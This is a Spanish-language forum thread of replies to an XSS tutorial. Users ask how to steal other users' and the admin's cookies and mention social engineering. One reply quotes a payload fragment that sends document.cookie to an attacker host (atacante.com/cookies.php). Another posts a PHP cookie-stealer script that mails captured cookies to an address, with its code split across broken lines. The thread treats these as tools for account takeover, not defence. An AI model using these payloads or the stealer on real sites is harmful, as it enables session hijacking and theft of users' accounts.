[::Tutorial::] - Ataques XSS

Iniciado por Rentero, 24 Mayo 2004, 03:49 AM

0 Miembros y 1 Visitante están viendo este tema.

Ch@CaL

Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?
Ch@CaL

|Azrack|

y si yo le paaso solo el enlace:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?

security


Dr. Stephen Falken

A día de hoy esta vulnerabilidad está casi capada. No?

NaphacK

Cita de: Dr. Stephen Falken en  9 Enero 2008, 19:46 PM
A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables...
Aunque tengo una duda...
Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
www.webvulnerable.com/free-press/unaslibrerias   por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
Saludos...
;) ;) ;)

merinodaniel

hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail...

<?php
     $cookie 
$_GET["cookie"];
     
mail("admin@gensale.net""Cookie stealer report"$cookie);
?>


este codigo seria para la pag: cookie.php
Este codigo fue publicado en el blog: blog.gensale.net
Yo no soy el autor..
byes

R007h